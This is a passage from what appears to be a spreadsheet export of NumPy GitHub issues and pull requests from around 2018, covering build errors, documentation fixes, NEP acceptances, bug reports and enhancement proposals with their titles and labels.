     #error Unknown CPU, please report this to numpy maintainers with \_x000D_
      ^_x000D_
error: Command "aarch64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -Inumpy/core/src/npymath -Inumpy/core/include -Inumpy/core/include/numpy -Inumpy/core/src/private -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/usr/include/python3.5m -Inumpy/core/src/private -Inumpy/core/src/npymath -Inumpy/core/src/private -Inumpy/core/src/npymath -Inumpy/core/src/private -Inumpy/core/src/npymath -c numpy/core/src/npymath/ieee754.c -o build/temp.linux-aarch64-3.5/numpy/core/src/npymath/ieee754.o -MMD -MF build/temp.linux-aarch64-3.5/numpy/core/src/npymath/ieee754.o.d" failed with exit status 1_x000D_
```_x000D_
_x000D_
I believe this is a result of the new detection logic introduced in #11016.  It seems as if `__arm__` and `__ARMEL__` may not be defined on some? aarch64 platforms.  Rather it may be necessary to use `__aarch64__` and `__AARCH64EL__`.</t>
  </si>
  <si>
    <t>NumPy fails to build on aarch64</t>
  </si>
  <si>
    <t>DOC: update release notes for LDFLAGS append behavior (gh-11525).</t>
  </si>
  <si>
    <t>The consensus on the mailing list leaned against the broadcast part of the gufunc syntax extension. This PR moves it to the `Alternative` section of the NEP.</t>
  </si>
  <si>
    <t>NEP: remove broadcast syntax from gufunc signature</t>
  </si>
  <si>
    <t xml:space="preserve">The original mail proposing to accept this NEP to set a random number generator policy was sent July 1. According to the NEP acceptance policy, more than a week has passed, and there was no opposition on the mailing list._x000D_
</t>
  </si>
  <si>
    <t>NEP: accept nep 0019</t>
  </si>
  <si>
    <t>The original mail proposing to accept this NEP to merge multiarray and umath modules was sent June 29. According to the NEP acceptance policy, more than a week has passed, and there was no opposition on the mailing list._x000D_
_x000D_
See also PR #10915 which implements the NEP.</t>
  </si>
  <si>
    <t>NEP: accept nep 0015</t>
  </si>
  <si>
    <t>See #11552</t>
  </si>
  <si>
    <t>DOC: Tiny typo on numpy/reference/arrays.dtypes.html</t>
  </si>
  <si>
    <t>Looking at the example (https://docs.scipy.org/doc/numpy/reference/generated/numpy.ma.average.html#numpy.ma.average), I would assume that if ``weights=None``, the elements are not considered, which is different in my understanding that having all weights equals to one._x000D_
_x000D_
Example_x000D_
======_x000D_
&gt;&gt;&gt; a = np.ma.array([1., 2., 3., 4.], mask=[False, False, True, True])_x000D_
&gt;&gt;&gt; np.ma.average(a, weights=[3, 1, 0, 0])_x000D_
1.25</t>
  </si>
  <si>
    <t>DOC: tweak doc for weights parameter of ma.average</t>
  </si>
  <si>
    <t>['04 - Documentation', '57 - Close?', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>In the description of the `optimize` parameter in the `einsum` function it says that default is `True`, while the default argument is actually `False`.</t>
  </si>
  <si>
    <t>Bug in einsum's docstring: 'optimize'</t>
  </si>
  <si>
    <t>Hi,_x000D_
I came across this behaviour which caused quite some confusion and which seems strange to me:_x000D_
If you use numpy.concatenate on lists of lists, it works if either all of the sub-lists have the same length or if all of them have different lengths ( see this discussion: https://stackoverflow.com/questions/51246704/how-does-numpy-concatenate-work-on-lists/51247760#51247760 )._x000D_
Apparently, that is because if none of the sub-lists have the same dimension, they are treated as lists, but if at least one has, they are converted to numpy arrays (?). So in the example on SO, the `failList` has two sub-lists which have the same dimensions (no.0 and no.2 have both lists of size 1), but 3 sub-lists of different dimensions._x000D_
In my opinion, numpy should treat the lists as lists if at least one element does not have the correct dimensions, or it should provide a better error message. Currently, it states that "all elements must have the same dimension", which is not true. Either all of them must be the same or, in case they are lists, all of them must be different.</t>
  </si>
  <si>
    <t>Strange behaviour of numpy.concatenate</t>
  </si>
  <si>
    <t>Note that the release supports Python 3.7._x000D_
_x000D_
[ci skip]</t>
  </si>
  <si>
    <t>DOC: Update the 1.15.0 release notes.</t>
  </si>
  <si>
    <t>numpy version: 1.14.3_x000D_
python version: 3.6.5_x000D_
_x000D_
This was originally reported in https://github.com/Microsoft/ptvsd/issues/465 (error was on `numpy.loadtxt`, but the real issue lies in `resize` itself)._x000D_
_x000D_
A sample to reproduce is:_x000D_
_x000D_
```_x000D_
import sys_x000D_
_x000D_
def trace_dispatch(frame, event, arg):_x000D_
    return trace_dispatch_x000D_
_x000D_
sys.settrace(trace_dispatch)_x000D_
_x000D_
def method():_x000D_
    import numpy_x000D_
    Y = numpy.array([1] * 10, numpy.float32)_x000D_
    Y.resize([20, 20])_x000D_
_x000D_
method()_x000D_
```_x000D_
_x000D_
When `Y.resize()` is reached, the following error is thrown:_x000D_
_x000D_
```_x000D_
ValueError: cannot resize an array that references or is referenced_x000D_
by another array in this way.  Use the resize function._x000D_
```_x000D_
_x000D_
So, it seems it's that way by design, but this also means that by design, any function which calls `array.resize` is not traceable (which I don't think is expected).</t>
  </si>
  <si>
    <t>BUG: Loadtxt should pass `checkref=False` to resize to avoid problems when tracing</t>
  </si>
  <si>
    <t>Hi,_x000D_
I finally figured out that numpy wheels included the openblas library (https://github.com/numpy/numpy/issues/10920)! It is not mentioned in the documentation._x000D_
_x000D_
It would be good to add short remarks on that in the install pages of the documentation (https://scipy.org/install.html#installing-via-pip, https://docs.scipy.org/doc/numpy-1.10.1/user/install.html)._x000D_
_x000D_
Actually there is nearly no mention of the wheels in the installation pages._x000D_
_x000D_
By the way, now that we have the wheels, the installation with pip is actually better than using apt-get, especially better than installing the package python-numpy (as written in the doc) which uses python 2.7!_x000D_
_x000D_
- The remark on `--user` is valid only if one uses the Python of the system. With pyenv or in a virtualenv, `pip install numpy` is fine._x000D_
- "Note that you need to have Python and pip already installed on your system." Could it be a good idea to point to https://github.com/pyenv/pyenv ? It is now a very nice and simple (even for beginners) way to get an up-to-date scientific environment.</t>
  </si>
  <si>
    <t>Update the documentation on installation, pip install and wheel included openblas</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: distribution']</t>
  </si>
  <si>
    <t>The `numpy.ctypeslib.ndpointer(…)` function creates bespoke new Python classes using calls to `type(…)`. These new classes inherit from `_ndptr` (a `ctypes` primitive representing a `PyArrayObject*`) and are created in such a way that they are particular to a set of givens: a `numpy.dtype`, a shape tuple, the array rank (`ndim`), and a tuple of string flags. Internal to the `numpy.ctypeslib` module is a dict, `_pointer_type_cache`, used by `ndpointer(…)` to cache the new classes it creates, composing a tuple to use as a dict key of the form `(dtype, ndim, shape, num)`._x000D_
_x000D_
The cache is accessed twice in `ndpointer(…)` – once in an attempt to read an existing entry, and should that fail, it is accessed again right before its final `return` statement to write an entry with the new class. The problem was that the second access had the second and third tuple elements erroneously transposed – it was `(dtype, shape, ndim, num)` rather instead of `(dtype, ndim, shape, num)`, resulting in a cache-miss rate of 100%._x000D_
_x000D_
This PR swaps the tuple elements to be consistent at both points of access to the cache.</t>
  </si>
  <si>
    <t>BUG: Swap erroneously transposed tuple elements in `_pointer_type_cache` key</t>
  </si>
  <si>
    <t>['00 - Bug', '55 - Needs work', 'component: Other']</t>
  </si>
  <si>
    <t>Previously a local `Stream` class would be defined every time a format needed parsing._x000D_
Classes in cpython create reference cycles, which create load on the GC._x000D_
_x000D_
This may or may not resolve gh-6511</t>
  </si>
  <si>
    <t>MAINT: Improve memory usage in PEP3118 format parsing</t>
  </si>
  <si>
    <t>DOC: Minor improvements to np.concatenate docstring</t>
  </si>
  <si>
    <t>DOC: Fixed example code for cheb2poly and poly2cheb (see #11519)</t>
  </si>
  <si>
    <t>Backport of  #11515._x000D_
_x000D_
Fixes #11507. Test added that fails before, passes after the fix.</t>
  </si>
  <si>
    <t>BUG: Decref of field title caused segfault</t>
  </si>
  <si>
    <t>Forward port of #11529 _x000D_
_x000D_
A new density argument is added to histogramdd. It is an alias for the existing normed argument and provides commonality with the histogram function in which the incorrectly implemented normed argument has been replaced by density._x000D_
_x000D_
Fixes gh-4371.</t>
  </si>
  <si>
    <t xml:space="preserve">ENH: Add density argument to histogramdd. </t>
  </si>
  <si>
    <t>This is a branch where I essentially reverted the major changes of #6053, since it causes some back-compat problems. Putting it here so we can compare, before deciding which way to go.  See discussion in #11526. This revers the "multifield indexing returns a view" change, and the "multifield assignment occurs by-position instead of by-name" change._x000D_
_x000D_
#6053 wouldn't all be a loss though. This PR still keeps all the little fixes from that PR, and I also make multifield assignment consistent: Before #6053 you would get different behavior depending on whether you did array vs scalar assignment. In #6053 I chose to make all of numpy use "copy-by-position" for multifield assignment, in this PR everything is "copy-by-name". That means there is still a back-compat break in this PR for structured scalar assignment, but probably it has much less effect than #6053._x000D_
_x000D_
So if we go this route, at least numpy will be more self-consistent, while still being fairly back-compatible._x000D_
_x000D_
Also, at least in #6053 I have worked out how I think multifield indexing behavior should work, without all the quirks of current numpy. The day we implement the new standalone structured dtypes I suggest we use the behavior I worked out in #6053, if we decide to remove it here._x000D_
_x000D_
A lot of the code change here is just pasting back in things I removed in #6053.</t>
  </si>
  <si>
    <t>MAINT: cancel multifield copy-&gt;view and copy-by-position plans (alternate proposal)</t>
  </si>
  <si>
    <t>['03 - Maintenance', '54 - Needs decision', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t>A new `density` argument is added to `histogramdd`. It is an alias for the existing `normed` argument and provides commonality with the `histogram` function in which the incorrectly implemented `normed` argument has been replaced by `density`._x000D_
_x000D_
Fixes gh-4371._x000D_
_x000D_
Less contentious version of #11397</t>
  </si>
  <si>
    <t>ENH: Add density argument to histogramdd.</t>
  </si>
  <si>
    <t>Choices made, and the alternatives rejected (for no particularly strong reason):_x000D_
_x000D_
1. Show terms in ascending order, to match their internal representation_x000D_
   * alternative: descending, to match convention_x000D_
2. Shows 0 terms in gray_x000D_
   * alternative: omit entirely_x000D_
   * alternative: show normally to aid comparison_x000D_
3. Write each term as `basis(ax + b)_x000D_
   * alternative: write as `basis(u) ... where u = ax + b`_x000D_
   * alternative: show the normalized polynomial_x000D_
_x000D_
In future it would perhaps make sense to expose these options to the end user</t>
  </si>
  <si>
    <t>ENH: Add support for ipython latex printing to polynomial</t>
  </si>
  <si>
    <t>['01 - Enhancement', '56 - Needs Release Note.', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t>The transform in line 620 onwards was the polar method, not Box-Muller. See section 11.3.1 of "Introduction to probability models" by Sheldon Ross (https://fac.ksu.edu.sa/sites/default/files/introduction-to-probability-model-s.ross-math-cs.blog_.ir_.pdf). Since this change only affects a comment, my environment is not relevant.</t>
  </si>
  <si>
    <t>DOC: Note that method is the polar form of Box-Muller.</t>
  </si>
  <si>
    <t>Adds helper functions for the copy-&gt;view transition for multi-field indexes. Adds `structured_to_unstructured`, `apply_along_fields`, `assign_fields_by_name`, `require_fields`._x000D_
_x000D_
This is based on the feedback from discussions on the mailing list and on github about cases where users wanted the "old" behavior. See https://github.com/numpy/numpy/pull/6053#issuecomment-383089812,  and this mailing list thread: http://numpy-discussion.10968.n7.nabble.com/Setting-custom-dtypes-and-1-14-tt45156.html#a45207. Note the reply there arguing we should skip `apply_along_fields`, maybe we should remove that one._x000D_
_x000D_
Don't merge yet. I'd like to let this sit a while in case there are more ideas for useful functions.  Putting it up now so everyone can get a sense of what is being proposed.</t>
  </si>
  <si>
    <t>ENH: add multi-field assignment helpers in np.lib.recfunctions</t>
  </si>
  <si>
    <t>['01 - Enhancement', '56 - Needs Release Note.', 'component: numpy.dtype', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>Fixes https://github.com/numpy/numpy/issues/7427</t>
  </si>
  <si>
    <t>MAINT: Append `*FLAGS` instead of overriding</t>
  </si>
  <si>
    <t>Fixes #9989</t>
  </si>
  <si>
    <t>BUG: fix np.load() of empty .npz file</t>
  </si>
  <si>
    <t xml:space="preserve">When polynomial.Chebyshev and polynomial.Legendre objects are converted to polynomial.Polynomial objects and evaluated, large errors can be introduced. For asymmetrical domains about zero (e.g. [0,1]), the error becomes catastrophic for polynomials of order greater than 20. For symmetrical domains about zero (e.g. [-1, 1]), the error becomes catastrophic for polynomials of order above 40._x000D_
_x000D_
The following code gives an example of the first case (asymmetric domain, order 23):_x000D_
_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; import numpy.polynomial as P_x000D_
&gt;&gt;&gt; import matplotlib.pyplot as plt_x000D_
&gt;&gt;&gt; dom = [0, 1]_x000D_
&gt;&gt;&gt; x = np.linspace(dom[0], dom[1], 1000)_x000D_
&gt;&gt;&gt; I = np.eye(100)_x000D_
&gt;&gt;&gt; c23 = P.Chebyshev(I[23],domain=dom)_x000D_
&gt;&gt;&gt; c23_poly = c23.convert(kind=P.Polynomial)_x000D_
&gt;&gt;&gt; plt.plot(x, c23_poly(x))_x000D_
&gt;&gt;&gt; plt.plot(x, c23(x))_x000D_
&gt;&gt;&gt; plt.show()_x000D_
_x000D_
The code above produces the attached plot_x000D_
![poly_conversion_error](https://user-images.githubusercontent.com/11010066/42399655-be4400aa-813c-11e8-94d2-c5ff7002e24c.PNG)_x000D_
</t>
  </si>
  <si>
    <t>Large error in converted polynomials</t>
  </si>
  <si>
    <t>This is used in `np.moveaxis`, which is relatively slow. Timings change as follows:_x000D_
```_x000D_
import numpy as np_x000D_
from numpy.core.numeric import normalize_axis_tuple_x000D_
%timeit normalize_axis_tuple([0, 1, 2], 4, 'parrot')_x000D_
a = np.zeros((10,20,30))_x000D_
%timeit np.moveaxis(a, [0,1,2], [2,1,0])_x000D_
100000 loops, best of 3: 5.56 µs per loop -&gt; 4.17 µs_x000D_
```_x000D_
_x000D_
Should add that I'm not really all that happy with the present solution, but I cannot think of a better one that wouldn't either impact the iterable or  the scalar case.</t>
  </si>
  <si>
    <t>MAINT: Speed up normalize_axis_tuple by about 30%</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #11507. Test added that fails before, passes after the fix._x000D_
_x000D_
`git tag --contains 9f27418f48` says it was first released in v1.14.0_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: decref of field title caused segfault</t>
  </si>
  <si>
    <t xml:space="preserve">Before, we did the worst of both worlds, checking the version of one then calling the other._x000D_
_x000D_
Still postponing #11484 </t>
  </si>
  <si>
    <t>Prefer the same-python cython to the on-PATH cython</t>
  </si>
  <si>
    <t>Add a template for new issues or PRs. _x000D_
_x000D_
May be enhanced with the output of `numpy.show_config` if that gets us more info, see also issue #10983_x000D_
_x000D_
A quick search on github and in the mailing list did not show open issues relating to this, did I miss a previous discussion?_x000D_
_x000D_
The `ISSUE_TEMPLATE.md` is adapted from SciPy.</t>
  </si>
  <si>
    <t>DOC: Add templates for issues and PRs</t>
  </si>
  <si>
    <t>['01 - Enhancement', '04 - Documentation', 'component: Other']</t>
  </si>
  <si>
    <t>The current logic for defining NPY_CPU_PPC64LE and NPY_CPU_PPC64 is_x000D_
incorrect for two reasons:_x000D_
1) The elif defined for `__powerpc__` is processed first so any_x000D_
ppc64le or ppc64 system is defined as NPY_CPU_PPC._x000D_
2) `__ppc64le__` is not defined on a ppc64le system. `__PPC64__` is_x000D_
defined and so is `__powerpc64__` but the check for little or_x000D_
big endian needs to be done separately._x000D_
_x000D_
This pull request fixes the defines for ppc64le and ppc64._x000D_
Note: This really isn't a issue in the numpy code base at this time_x000D_
because the only place this variable is referenced is in npy_endian.h_x000D_
as a fallback in case endian.h is not on the system._x000D_
It would be good to fix in case future code does reference_x000D_
these defines.</t>
  </si>
  <si>
    <t>BUG: Fix #define for ppc64 and ppc64le</t>
  </si>
  <si>
    <t>Example: say, we have an array `g`. Some its recombination in Matlab is a one-liner:_x000D_
```matlab_x000D_
g = [something]_x000D_
[g(1); g(2:n)+g(2*n:-1:n+2); g(n+1)]_x000D_
```_x000D_
I suggest adding this possibility to `np.concatenate()`:_x000D_
```python_x000D_
g = np.array(something)_x000D_
np.concatenate((g[0], g[1:n] + g[2 * n:n:-1], g[n + 1]))_x000D_
```_x000D_
It's not really clear why NumPy cannot convert a number to, e.g., a list, if it can detect its type and shape, because adding even more brackets works, but doesn't make a lot of sense:_x000D_
`np.concatenate(([g[0]], g[1:n] + g[2 * n:n:-1], [g[n + 1]])) `</t>
  </si>
  <si>
    <t>DOC ENH: concatenate arrays with numbers</t>
  </si>
  <si>
    <t xml:space="preserve">Sample script with all the conditions:_x000D_
_x000D_
```_x000D_
import numpy as np_x000D_
_x000D_
t = np.dtype([(('Some field description', 'f1'), np.float64)])_x000D_
data = np.zeros(100, t)_x000D_
for i in xrange(10):_x000D_
    print(i)_x000D_
    np.require(data[['f1']], t)_x000D_
```_x000D_
_x000D_
Output:_x000D_
```_x000D_
0_x000D_
1_x000D_
2_x000D_
3_x000D_
4_x000D_
5_x000D_
6_x000D_
_x000D_
Process finished with exit code -1073741819 (0xC0000005)_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Python crash after several iterations of np.require</t>
  </si>
  <si>
    <t>Adds a feature to simplify moving axes around:_x000D_
_x000D_
    x = np.zeros((0, 1, 2))_x000D_
    np.moveaxis(x, 'xyz', 'zyx')_x000D_
    np.moveaxis(x, 'ijk', 'kji') # has the same effect as above</t>
  </si>
  <si>
    <t>ENH: Allow moveaxis() to take strings as axis order</t>
  </si>
  <si>
    <t>Extracted from the more troublesome #11484</t>
  </si>
  <si>
    <t>MAINT: Tidy cython invocation</t>
  </si>
  <si>
    <t xml:space="preserve">Suspected bug in NumPy for Python3.7_x000D_
_x000D_
There is some problem in calculation (I don't know exactly where)_x000D_
_x000D_
I used array,transpose,dot and multiply in my program._x000D_
_x000D_
My code works 100% fine with Python3.6-numpy_x000D_
_x000D_
![screenshot from 2018-07-04 17-59-14](https://user-images.githubusercontent.com/39848443/42281121-0f016dfc-7fbc-11e8-9aca-37699366726f.png)_x000D_
</t>
  </si>
  <si>
    <t>Calculation Error</t>
  </si>
  <si>
    <t>When the index array was non contiguous and not 1D the assignment_x000D_
1D fastpath (indexed array being 1D) was incorrectly taken (also_x000D_
the assignment value had to be 0D for this to happen)._x000D_
This caused the iteration to use the itemsize as a stride, since_x000D_
it incorrectly assumed the array must be contiguous._x000D_
_x000D_
The commit additionally adds an assert to the STRIDE fetching macro._x000D_
_x000D_
Closes gh-11467.</t>
  </si>
  <si>
    <t>BUG: Advanced indexing assignment incorrectly took 1-D fastpath</t>
  </si>
  <si>
    <t>Title says it all.</t>
  </si>
  <si>
    <t>BENCH: belated addition of lcm, gcd to ufunc benchmark.</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: benchmarks', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>``[ci skip]``_x000D_
_x000D_
Noticed this was missing. should also be backported to 1.15.x I think, we need 3.7 wheels for that release.</t>
  </si>
  <si>
    <t>MAINT: add PyPI classifier for Python 3.7</t>
  </si>
  <si>
    <t>Numpy on windows wheels was clearing the DLL path on load, leading_x000D_
to any DLL loads subsequent to the NumPy load._x000D_
_x000D_
This isn't a straight revert, it restores to the 1.15.x version of_x000D_
the relevant code._x000D_
_x000D_
Closes #11431.</t>
  </si>
  <si>
    <t>BUG: Revert #10229 to fix DLL loads on Windows.</t>
  </si>
  <si>
    <t>Syncs einsum path optimization tech between `numpy` and `opt_einsum`. In particular, the `greedy` path has received many enhancements by @jcmgray. A full list of issues fixed in this PR are:_x000D_
 - Allows arbitrary memory to be passed into the `greedy` path. Fixes gh-11210._x000D_
 - The greedy path has been updated to contain more dynamic programming ideas preventing a large number of duplicate (and expensive) calls that figure out the actual pair contraction that takes place. Now takes a few seconds on several hundred input tensors. Useful for matrix product state theories._x000D_
 - Reworks the broadcasting dot error catching found in gh-11218 gh-10352 to be a bit earlier in the process._x000D_
 - Enhances the `can_dot` functionality that previous missed an edge case (part of gh-11308).</t>
  </si>
  <si>
    <t>BUG/ENH: Einsum optimization path updates and bug fixes.</t>
  </si>
  <si>
    <t>If the `to_end` or `to_begin` argument is an invalid type for the array, you don't get an error message, you just get bad results.  For example, if you try to put `np.nan` into an int array:_x000D_
_x000D_
```Python_x000D_
a = np.array([1, 2, 3])_x000D_
np.ediff1d(a, np.nan)_x000D_
```_x000D_
You get `array([                   1,                    1, -9223372036854775808])`</t>
  </si>
  <si>
    <t>ediff1d handles data type errors badly</t>
  </si>
  <si>
    <t>In einsum, if out is given, it should be assigned to ret.</t>
  </si>
  <si>
    <t>BUG: Ensure out is returned in einsum.</t>
  </si>
  <si>
    <t>Extend sanity check message to mention package managers, and encourage users to search closed issues._x000D_
_x000D_
In response to #11481</t>
  </si>
  <si>
    <t>DOC: extend sanity check message</t>
  </si>
  <si>
    <t xml:space="preserve">This unfortunately doesn't work too well, since the imported cython might not match the executed one (fixed in #11514), but its a start..._x000D_
_x000D_
relates to #11483 </t>
  </si>
  <si>
    <t xml:space="preserve"> BUG: Increase required cython version on python 3.7</t>
  </si>
  <si>
    <t>It seems I need to retranspile the cython code, but I can't work out how to make that happen:_x000D_
_x000D_
```_x000D_
numpy\random\mtrand\mtrand.c(38385): warning C4244: '=': conversion from 'npy_intp' to 'long', possible loss of data_x000D_
numpy\random\mtrand\mtrand.c(38395): warning C4244: 'function': conversion from 'npy_intp' to 'long', possible loss of data_x000D_
numpy\random\mtrand\mtrand.c(38462): warning C4244: '=': conversion from 'npy_intp' to 'long', possible loss of data_x000D_
numpy\random\mtrand\mtrand.c(39831): warning C4244: 'function': conversion from 'npy_intp' to 'unsigned long', possible loss of data_x000D_
numpy\random\mtrand\mtrand.c(40021): warning C4244: 'function': conversion from 'npy_intp' to 'unsigned long', possible loss of data_x000D_
numpy\random\mtrand\mtrand.c(40187): warning C4244: 'function': conversion from 'npy_intp' to 'unsigned long', possible loss of data_x000D_
numpy\random\mtrand\mtrand.c(43481): warning C4146: unary minus operator applied to unsigned type, result still unsigned_x000D_
numpy\random\mtrand\mtrand.c(45546): error C2039: 'exc_type': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45547): error C2039: 'exc_value': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45548): error C2039: 'exc_traceback': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45555): error C2039: 'exc_type': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45556): error C2039: 'exc_value': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45557): error C2039: 'exc_traceback': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45558): error C2039: 'exc_type': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45559): error C2039: 'exc_value': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45560): error C2039: 'exc_traceback': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45615): error C2039: 'exc_type': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45616): error C2039: 'exc_value': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45617): error C2039: 'exc_traceback': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45618): error C2039: 'exc_type': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45619): error C2039: 'exc_value': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(45620): error C2039: 'exc_traceback': is not a member of '_ts'_x000D_
c:\users\wiese\appdata\local\programs\python\python37\include\pystate.h(209): note: see declaration of '_ts'_x000D_
numpy\random\mtrand\mtrand.c(46019): warning C4020: 'function through pointer': too many actual parameters_x000D_
error: Command "C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.11.25503\bin\HostX86\x64\cl.exe /c /nologo /Ox /W3 /GL /DNDEBUG /MD -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -DNPY_NEEDS_MINGW_TIME_WORKAROUND -Inumpy\core\include -Ibuild\src.win-amd64-3.7\numpy\core\include/numpy -Inumpy\core\src\private -Inumpy\core\src -Inumpy\core -Inumpy\core\src\npymath -Inumpy\core\src\multiarray -Inumpy\core\src\umath -Inumpy\core\src\npysort -IC:\Users\wiese\AppData\Local\Programs\Python\Python37\include -IC:\Users\wiese\AppData\Local\Programs\Python\Python37\include -Ibuild\src.win-amd64-3.7\numpy\core\src\private -Ibuild\src.win-amd64-3.7\numpy\core\src\npymath -Ibuild\src.win-amd64-3.7\numpy\core\src\private -Ibuild\src.win-amd64-3.7\numpy\core\src\npymath -Ibuild\src.win-amd64-3.7\numpy\core\src\private -Ibuild\src.win-amd64-3.7\numpy\core\src\npymath -I"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.11.25503\include" -I"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\ucrt" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\shared" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\winrt" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\INCLUDE" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\ucrt" -I"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\shared" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\winrt" /Tcnumpy\random\mtrand\mtrand.c /Fobuild\temp.win-amd64-3.7\Release\numpy\random\mtrand\mtrand.obj" failed with exit status 2_x000D_
```</t>
  </si>
  <si>
    <t>Unable to build from source with (C)Python 3.7.0 / cython 0.28.3 on windows</t>
  </si>
  <si>
    <t>I find it counterintuitive that resizing a numpy array does NOT consider dimensions independent, but simply takes the first N elements of the input array that fit into the output array. I was expecting something more like `cv2.resize()` where axes are treated separately, and some form of interpolation is applied to each dimension._x000D_
_x000D_
numpy resizes an old 5x5x2 array into a new array with new = np.resize(old, (4, 4, 2)) by simply copying the first 4 * 4 * 2 entries from old into new. (e.g. old[0, 4, :] becomes new[1, 0, :])_x000D_
This is a problem if we would like simple interpolation, or if different axes represent different entities. (If the above example is an image, the top right most pixel would get warped all the way to the left, which is most likely not the intention)_x000D_
_x000D_
In response to my issue #11478: 'resize() is unintuitive by not treating axes separately?'_x000D_
A warning in the docs might prevent some confusion._x000D_
_x000D_
For a discussion on the issue and a possible solution, see &lt;https://github.com/numpy/numpy/issues/11478&gt;</t>
  </si>
  <si>
    <t>DOC: Include warning in np.resize() docs</t>
  </si>
  <si>
    <t>Follow-up on #11338, with a move of all functions from `src/private` that is useful only to `umath` or `multiarray` to the files where they are actually used. No changes except to function names. Follow-up will be to get `out` only once in `override.c` (and then percolate this up)._x000D_
_x000D_
I think this should be uncontroversial except I'm not 100% sure on best practice for the names of the functions - ideally, they give a hint about the include file they came from. (Also, eventually `GetOutObjects` should likely be moved somewhere else. But I think that can be done later.)_x000D_
_x000D_
@eric-wieser - requesting your review since you already did #11338.</t>
  </si>
  <si>
    <t>MAINT: move ufunc override code to umath and multiarray as much as possible.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a loop for reading a file line by line and processing it which among other things picks a random sample from all the lines seen till the point, say stored in `seen[]` , where each element of `seen[]` is itself a list with varying sizes._x000D_
_x000D_
Now, before I was using `chosen = numpy.random.choice(seen)` with which the loop processing started with ~`5000` it/sec and smoothly decreased to ~`150`it/sec . Replacing that by `chosen = seen[random.randint(0,len(seen)-1)]` gives me a consistent ~`16500`it/sec as found out by the `tqdm()` package._x000D_
_x000D_
While this is such a simple tweak, I am bewildered by this annoying glitch and wasted a lot of time profiling my code trying to find the bottleneck. I wished to check with the devs why is this happening and if this can be corrected in the future versions. _x000D_
</t>
  </si>
  <si>
    <t>numpy.random.choice is super slow for choosing a single element (~100x slower)</t>
  </si>
  <si>
    <t>['component: benchmarks', 'component: numpy.random']</t>
  </si>
  <si>
    <t>The changes in this pull request restrict the arguments ngood and nbad_x000D_
of numpy.random.hypergeometric to be less than 2**30.  This "fix" (in the_x000D_
sense of the old joke "Doctor, it hurts when I do *this*") makes the_x000D_
